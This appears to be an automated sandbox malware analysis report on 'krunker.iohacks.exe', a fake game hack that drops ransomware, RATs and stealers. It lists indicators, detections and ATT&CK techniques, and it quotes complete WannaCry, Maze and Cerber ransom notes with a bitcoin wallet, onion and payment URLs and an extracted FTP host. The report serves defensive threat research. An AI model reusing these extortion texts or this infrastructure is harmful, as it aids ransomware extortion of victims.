asyncrat | 892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba

Resubmissions

02-09-2024 06:59

240902-hsk4hawbnd 10

02-09-2024 06:58

240902-hrpqaswbmb 10

02-09-2024 02:33

240902-c16ghszgkh 10

16-04-2024 14:39

240416-r1ca1ace39 10

Analysis

max time kernel
23s
max time network
1804s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 08:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

krunker.iohacks.exe
Size

30.9MB
MD5

2850f1cb75953d9e0232344f6a13bf48
SHA1

141ab8929fbe01031ab1e559d880440ae931cc16
SHA256

892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba
SHA512

25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d
SSDEEP

786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
files.000webhost.com
Port:
21
Username:
fcb-aws-host-4

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Extracted

Path

C:\odt\DECRYPT-FILES.txt

Family

maze

Ransom Note

Attention! ---------------------------- | What happened? ---------------------------- We hacked your network and now all your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. You cannot access the files right now. But do not worry. You can get it back! It is easy to recover in a few steps. We have also downloaded a lot of private data from your network, so in case of not contacting us as soon as possible this data will be released. If you do not contact us in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. To see what happens to those who don't contact us, google: * Southwire Maze Ransomware * MDLab Maze Ransomware * City of Pensacola Maze Ransomware After the payment the data will be removed from our disks and decryptor will be given to you, so you can restore all your files. ---------------------------- | How to contact us and get my files back? ---------------------------- The only method to restore your files and be safe from data leakage is to purchase a unique for you private key which is securely stored on our servers. To contact us and purchase the key you have to visit our website in a hidden TOR network. There are general 2 ways to reach us: 1) [Recommended] Using hidden TOR network. a) Download a special TOR browser: https://www.torproject.org/ b) Install the TOR Browser. c) Open the TOR Browser. d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/6b770cb56c21413c e) Follow the instructions on this page. 2) If you have any problems connecting or using TOR network a) Open our website: https://mazedecrypt.top/6b770cb56c21413c b) Follow the instructions on this page. Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. On this page, you will see instructions on how to make a free decryption test and how to pay. Also it has a live chat with our operators and support team. ---------------------------- | What about guarantees? ---------------------------- We understand your stress and worry. So you have a FREE opportunity to test a service by instantly decrypting for free three files from every system in your network. If you have any problems our friendly support team is always here to assist you in a live chat! P.S. Dear system administrators, do not think you can handle it by yourself. Inform leadership as soon as possible. By hiding the fact of the breach you will be eventually fired and sometimes even sued. ------------------------------------------------------------------------------- THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU ---BEGIN MAZE KEY--- VJtqyqSTk3UEjGqpxnbI9DLO5xf3WF4WQ5CesA8TJk7KlIvbeVGvqE67MVh+X2EbBtcH+fSkNQy4jmAOoKU9SbQWgPGlrGKvLFqWD7pGpXZUnSTBCaEw0KbHXprzM8qeYa+ZO+ozW9U+f+TFDs0C3txI+i9lv6VA+iOpTfn8kl9616RmxR8VS2LiAIxEyoZr6HAa9sgknKAM4dCCFhjmyLHoK/qdATrZhIMRn2GqdKr08Mp4qaoyG5usKU0uw9P/Jj+WSXgHjEwFWi8KunXv+XuE4TeI7wg75B+/7tLYMOkSuB/dSNbjNXYfalZP80g7ghi2EoNVNj70Ig/EpRYNAuAySW8M5wLZNwJjJI1CObXHyN767wWdG6xBbffQiFcJKG1uf+NmTmHh743JBSy9tCW8dLSKg54YvDrwUy9sPmiHbKgE5DySMlEJi3oq/lz7CorrtQsZCrP03AWjNWszgczuYL04ToodynnCQ7HdwU8bUN+XoVpE+iqfqc2vj6a20Cr/IcVcmS9kj0ykhrGPBJqhoserK9M7CO8V1yGYTXipd5HM2HHeS1ly3Iev5eW7cYHLu+rmT5/0uQEIhBVvqYI9d+7u1eK5UWKpc3PRxSDTHsju3/D+1S5CCLcOAu3dc9xQFzMTvXgfRkpY9UL+WL8gXgCeHPlB6Tmdbxwsmlv1Id+1BeAdv/WNQVqe2UTi9ifosrbazPLCY7O7qDHLiIhTrxuOcYHBbAv17waGJ+wU5aYtu34Go/9WhUoKRdgtZTECOU5PmRrIfqjaGAN9Qpt0hh8BpDH1PAxL/l6g570wEiRMhS7NZw6JuY7eubyqwgGlHWwT1EKHLKHjEII2+TySjqxBRnKg0MZsXSh8o7nxrUfskLhly93dQJKZoZTD9ELZmW5zKRhpa7YeAxpYL9xQySfIThSOzm0EUpeteAGg0Yb4JcW5nPXr49uNDxB9XQN7ELnXzTl7oq6zNxmmTS5ogq/rtPpDP3FfXMdMhIos6PNo3lHm3kXLkzMhUoi6hDh82N7YT+YVXFyQ86PHci/mD3YP0nbyZsJnrQhaOTIKuAZ8/wGN4hYOYjwFlNbDzP3VLK1I5hH9x/LkF5Yo2gMVT71jcLcz3rHJRqeiBd6xHsDiGXxVuJ8+tkWRebwxXPUZ2IHIX14SrJ7XwGWorfe8jYoGExI25fPVJjYOSX6WnvCOfeRxVUNH+lRJNmqjiaINaBSWTNW1ZNWzQcbnEuUbd3cniGKZbVmtoSHvln4ysiVZfAKjMbPu0iVhVnJLWekUmdY+uZwGotMXtr2JkIZjfK7Vx6PzMeWccduWwwBylLM+IO8tFYz/vvrS7rsjkVbhSjGF2i26WnDZwmoh6JTcsztWVZyBrAfgdpbh3q2RwRZR8LrzfSeAHEEtTqaV4soSPlL8X2WcpSBRf/efnqBZN5VZ5g+XJX2GsLBOn6KUms1FtxZjuAsv/E0aEQn8vOl6/utoqMqZfkW4U79Al1OdhRB32WPVqxVFm7y4Ct0GEXRRrUjaHBuEzqvWZVqBCHj8gV/7YRHyQ8WuD7qJ2LwwvoUmlCmziTY1m2uTn+0AKuomMPJh2mGCLe6G/6bOWOHX48dOZfbSJfcp2VUtrasVelQ/WV/rjjBWkUF0RjMrf5/m3raDJqT2oRdFKCxx7KK8I+uvFbi6SWHb/1YodDgtiTF27PhchkOaK81/CNrPMKmMYinmoZbgm4AabmaFtL6KPBzZqbobNsgi0tR5qGx3pU1OtzCL5i6e2+RHlxXlZf1yb8QnstxZ7Crdhg1UvKtF5LvEYt3L9rY9YFnSslB5Nj4pIHmMH+EXjQa4nhPQredAbGIGFJRL9NUHwBaDsmAntKETUZxqN901QiZUl3l2u4cR3loMXgfeEh3PIQXSMMuVzvu3CTLFCnno83qvOT+gZFlTgXl9XaNEZ8bPQkgUQhTVM93OGAx6p5wcchEv45VC0yv7lr3YVW76mU9CpTMSq/N5B5bCkvWFOEvgC05m2eLCCWvfeVs2yXIKx9p7ScZiDGG8o8nOHgmOt4vmzaCYNGfF1f+La9G7Hf1sLLcPkdgnqCQ05i3Zq0ZcBwCC4htlctsYGXNt/msWyiMc36FIq073fFVZFR683h7flNjhBb/E6diNyXRV7WEbJ5XrqI+ez9zdTDI7u1FA1eosc8/gwIDxQDigaG1ibiBDYLc1UKXuS6fznztHVJCK57gZ4jUrW5NGxueUc3HQKTaV2M37cQoiNgBiADcANwAwAGMAYgA1ADYAYwAyADEANAAxADMAYwAAABCAYBoMQQBkAG0AaQBuAAAAIiZXAE8AUgBLAEcAUgBPAFUAUABcAE8AQQBJAEwAVgBDAE4AWQAAACoMbgBvAG4AZQB8AAAAMixXAGkAbgBkAG8AdwBzACAAMQAwACAARQBuAHQAZQByAHAAcgBpAHMAZQAAADoofABkAGUAcAByAGUAYwBhAHQAZQBkACAAPgAgAHYAMgAuADMAfAAAAEJWfABDAF8ARgBfADIAMAA0ADQANAAvADIANAAxADMANgAxAHwARABfAFUAXwAwAC8AMAB8AEYAXwBGAF8AMgAwADQAMgAxAC8AMgAwADQANwA5AHwAAABIAFBAWIkIYIkIaIkIcPjI4nJ4DIABAYoBBTIuMy4x ---END MAZE KEY---

URLs

http://aoacugmutagkwctu.onion/6b770cb56c21413c

https://mazedecrypt.top/6b770cb56c21413c

Extracted

Path

C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\_R_E_A_D___T_H_I_S___MNTW_.txt

Family

cerber

Ransom Note

Hi, I'am CRBR ENCRYPTOR ;) ----- ALL YOUR DOCUMENTS, PH0T0S, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only one way to decrypt your files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_R_E_A_D___T_H_I_S_*) with complete instructions how to decrypt your files. If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, follow the instructions below: ----- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://xpcx6erilkjced3j.onion/9A95-58DF-5B60-0098-B222 Note! This page is available via "Tor Browser" only. ----- Also you can use temporary addresses on your personal page without using "Tor Browser". ----- 1. http://xpcx6erilkjced3j.1n5mod.top/9A95-58DF-5B60-0098-B222 2. http://xpcx6erilkjced3j.19kdeh.top/9A95-58DF-5B60-0098-B222 3. http://xpcx6erilkjced3j.1mpsnr.top/9A95-58DF-5B60-0098-B222 4. http://xpcx6erilkjced3j.18ey8e.top/9A95-58DF-5B60-0098-B222 5. http://xpcx6erilkjced3j.17gcun.top/9A95-58DF-5B60-0098-B222 ----- Note! These are temporary addresses! They will be available for a limited amount of time! -----

URLs

http://xpcx6erilkjced3j.onion/9A95-58DF-5B60-0098-B222

http://xpcx6erilkjced3j.1n5mod.top/9A95-58DF-5B60-0098-B222

http://xpcx6erilkjced3j.19kdeh.top/9A95-58DF-5B60-0098-B222

http://xpcx6erilkjced3j.1mpsnr.top/9A95-58DF-5B60-0098-B222

http://xpcx6erilkjced3j.18ey8e.top/9A95-58DF-5B60-0098-B222

http://xpcx6erilkjced3j.17gcun.top/9A95-58DF-5B60-0098-B222

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Cerber
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
ransomware cerber
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Neshta payload 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe	family_neshta
C:\odt\OFFICE~1.EXE	family_neshta
behavioral3/memory/3448-248-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/3448-532-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/3448-588-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/4936-964-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\first.exe	family_xworm

Detect ZGRat V1 8 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe	family_zgrat_v1
behavioral3/memory/5668-1272-0x0000000000600000-0x0000000000B04000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex12.exe	family_zgrat_v1
C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dais123.exe	family_zgrat_v1

Maze
Ransomware family also known as ChaCha.
trojan ransomware maze
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Process spawned unexpected child process 7 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5364	908	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5780	908	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5792	908	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6076	908	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3904	908	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	908	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5240	908	schtasks.exe

PureLog Stealer
PureLog Stealer is an infostealer written in C#.
stealer purelogstealer

PureLog Stealer payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Nvokcuobkn.exe	family_purelog_stealer

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghhjhjhsg.exe	family_quasar
C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Control.exe	family_quasar

Ramnit
Ramnit is a versatile family that holds viruses, worms, and Trojans.
trojan spyware stealer worm banker ramnit
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 8 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\configurationValue\fate.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dais123.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\1001107001\jok.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\new1.exe	family_redline

Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
ransomware trojan troldesh
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Anyns.exe	family_asyncrat

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral3/memory/5772-520-0x0000000000790000-0x0000000000824000-memory.dmp	dcrat
C:\Windows\System32\imapi2fs\lsass.exe	dcrat

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral3/memory/984-1348-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView

Nirsoft 1 IoCs

Processes:

resource	yara_rule
behavioral3/memory/984-1348-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft

Contacts a large (1480) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 3 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exe

pid process

4908 netsh.exe
2552 netsh.exe
1672 netsh.exe

pid	process
4908	netsh.exe
2552	netsh.exe
1672	netsh.exe

Office macro that triggers on suspicious action 1 IoCs

Office document macro which triggers in special circumstances - often malicious.

macro macro_on_action

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\2.doc	office_macro_on_action

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe	net_reactor

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

krunker.iohacks.exebot.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	krunker.iohacks.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	bot.exe

Executes dropped EXE 11 IoCs

Processes:

4363463463464363463463463.exebot.exe[email protected][email protected][email protected]RIP_YOUR_PC_LOL.exeska2pwej.aeh.exe1.exebot.exeska2pwej.aeh.tmptaskdl.exe

pid	process
4720	4363463463464363463463463.exe
3448	bot.exe
3752	[email protected]
4624	[email protected]
3400	[email protected]
1704	RIP_YOUR_PC_LOL.exe
3444	ska2pwej.aeh.exe
4440	1.exe
3120	bot.exe
740	ska2pwej.aeh.tmp
3412	taskdl.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exe

pid process

4992 icacls.exe
1656 icacls.exe
Modifies system executable filetype association 2 TTPs 1 IoCs
persistence

Modify Registry
T1112

Change Default File Association
T1546.001

Processes:

bot.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" bot.exe

pid	process
4992	icacls.exe
1656	icacls.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	bot.exe

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\TCtWWxpOvEx5fksBQuc7iBaR.exe	themida

UPX packed file 18 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral3/memory/4624-107-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral3/memory/4624-105-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral3/memory/4624-170-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral3/memory/4624-171-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral3/memory/4624-173-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral3/memory/4624-261-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral3/memory/4624-537-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral3/memory/4624-586-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral3/memory/4624-590-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Tempspwak.exe	upx
behavioral3/memory/5956-885-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral3/memory/6076-1021-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral3/memory/5376-1027-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral3/memory/4336-1041-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral3/memory/3688-1009-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral3/memory/6076-1167-0x0000000000400000-0x0000000000416000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laplas03.exe	upx
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wr.exe	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\klounada.exe	vmprotect

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\""	[email protected]

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

[email protected]

description	ioc	process
File opened (read-only)	\??\t:	[email protected]
File opened (read-only)	\??\z:	[email protected]
File opened (read-only)	\??\g:	[email protected]
File opened (read-only)	\??\h:	[email protected]
File opened (read-only)	\??\n:	[email protected]
File opened (read-only)	\??\o:	[email protected]
File opened (read-only)	\??\s:	[email protected]
File opened (read-only)	\??\w:	[email protected]
File opened (read-only)	\??\b:	[email protected]
File opened (read-only)	\??\m:	[email protected]
File opened (read-only)	\??\p:	[email protected]
File opened (read-only)	\??\q:	[email protected]
File opened (read-only)	\??\y:	[email protected]
File opened (read-only)	\??\a:	[email protected]
File opened (read-only)	\??\j:	[email protected]
File opened (read-only)	\??\k:	[email protected]
File opened (read-only)	\??\v:	[email protected]
File opened (read-only)	\??\u:	[email protected]
File opened (read-only)	\??\x:	[email protected]
File opened (read-only)	\??\e:	[email protected]
File opened (read-only)	\??\i:	[email protected]
File opened (read-only)	\??\l:	[email protected]
File opened (read-only)	\??\r:	[email protected]

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

Processes:

flow	ioc
3047	pastebin.com
3400	raw.githubusercontent.com
2951	raw.githubusercontent.com
3144	pastebin.com
3535	pastebin.com
3555	pastebin.com
15	iplogger.org
17	iplogger.org
2952	raw.githubusercontent.com
3545	pastebin.com
13	iplogger.org
14	iplogger.org
3049	pastebin.com
3147	pastebin.com
3408	raw.githubusercontent.com

Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3259 api.myip.com
3260 api.myip.com
3264 ipinfo.io
3266 ipinfo.io
3914 ip-api.com
94 whatismyipaddress.com
96 whatismyipaddress.com
2932 ip-api.com
Drops file in Windows directory 1 IoCs

Processes:

bot.exe

description ioc process

File opened for modification C:\Windows\svchost.com bot.exe

flow	ioc
3259	api.myip.com
3260	api.myip.com
3264	ipinfo.io
3266	ipinfo.io
3914	ip-api.com
94	whatismyipaddress.com
96	whatismyipaddress.com
2932	ip-api.com

description	ioc	process
File opened for modification	C:\Windows\svchost.com	bot.exe

Launches sc.exe 22 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2320	sc.exe
5008	sc.exe
1524	sc.exe
5308	sc.exe
4984	sc.exe
1628	sc.exe
2900	sc.exe
7600	sc.exe
2332	sc.exe
5972	sc.exe
4688	sc.exe
8076	sc.exe
1620	sc.exe
4048	sc.exe
5728	sc.exe
5724	sc.exe
1156	sc.exe
1840	sc.exe
5088	sc.exe
2572	sc.exe
796	sc.exe
6480	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 11 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
6544	4988	WerFault.exe	ISetup4.exe
6676	5188	WerFault.exe	swiiiii.exe
8112	6888	WerFault.exe	ISetup2.exe
5908	4496	WerFault.exe	1111.exe
5868	4208	WerFault.exe	swiiiii.exe
5144	2224	WerFault.exe	koooooo.exe
2140	1184	WerFault.exe	U5BC0~1.EXE
4820	6740	WerFault.exe	ISetup8.exe
5340	4596	WerFault.exe	G2VTUP~1.EXE
2456	2656	WerFault.exe	U3JO0~1.EXE
5052	7840	WerFault.exe	U5780~1.EXE

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
5792	schtasks.exe
6076	schtasks.exe
3904	schtasks.exe
6248	schtasks.exe
5660	schtasks.exe
6608	schtasks.exe
5856	schtasks.exe
5364	schtasks.exe
3036	schtasks.exe
5240	schtasks.exe
5624	schtasks.exe
5780	schtasks.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3528 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

7152 taskkill.exe
Modifies registry class 1 IoCs

Processes:

bot.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" bot.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

5900 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

4964 NOTEPAD.EXE
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

8048 PING.EXE
5584 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

[email protected]

pid process

4624 [email protected]
4624 [email protected]
4624 [email protected]
4624 [email protected]

pid	process
3528	timeout.exe

pid	process
7152	taskkill.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	bot.exe

pid	process
5900	reg.exe

pid	process
4964	NOTEPAD.EXE

pid	process
8048	PING.EXE
5584	PING.EXE

description	flow	ioc
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
4624	[email protected]
4624	[email protected]
4624	[email protected]
4624	[email protected]

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

krunker.iohacks.execmd.exeRIP_YOUR_PC_LOL.exebot.exe[email protected]ska2pwej.aeh.exe1.exe[email protected]

description	pid	process	target process
PID 4344 wrote to memory of 3228	4344	krunker.iohacks.exe	cmd.exe
PID 4344 wrote to memory of 3228	4344	krunker.iohacks.exe	cmd.exe
PID 4344 wrote to memory of 3228	4344	krunker.iohacks.exe	cmd.exe
PID 3228 wrote to memory of 4720	3228	cmd.exe	4363463463464363463463463.exe
PID 3228 wrote to memory of 4720	3228	cmd.exe	4363463463464363463463463.exe
PID 3228 wrote to memory of 4720	3228	cmd.exe	4363463463464363463463463.exe
PID 3228 wrote to memory of 3448	3228	cmd.exe	bot.exe
PID 3228 wrote to memory of 3448	3228	cmd.exe	bot.exe
PID 3228 wrote to memory of 3448	3228	cmd.exe	bot.exe
PID 3228 wrote to memory of 3752	3228	cmd.exe	[email protected]
PID 3228 wrote to memory of 3752	3228	cmd.exe	[email protected]
PID 3228 wrote to memory of 3752	3228	cmd.exe	[email protected]
PID 3228 wrote to memory of 4624	3228	cmd.exe	[email protected]
PID 3228 wrote to memory of 4624	3228	cmd.exe	[email protected]
PID 3228 wrote to memory of 4624	3228	cmd.exe	[email protected]
PID 3228 wrote to memory of 3400	3228	cmd.exe	[email protected]
PID 3228 wrote to memory of 3400	3228	cmd.exe	[email protected]
PID 3228 wrote to memory of 3400	3228	cmd.exe	[email protected]
PID 3228 wrote to memory of 1704	3228	cmd.exe	RIP_YOUR_PC_LOL.exe
PID 3228 wrote to memory of 1704	3228	cmd.exe	RIP_YOUR_PC_LOL.exe
PID 3228 wrote to memory of 1704	3228	cmd.exe	RIP_YOUR_PC_LOL.exe
PID 3228 wrote to memory of 3444	3228	cmd.exe	ska2pwej.aeh.exe
PID 3228 wrote to memory of 3444	3228	cmd.exe	ska2pwej.aeh.exe
PID 3228 wrote to memory of 3444	3228	cmd.exe	ska2pwej.aeh.exe
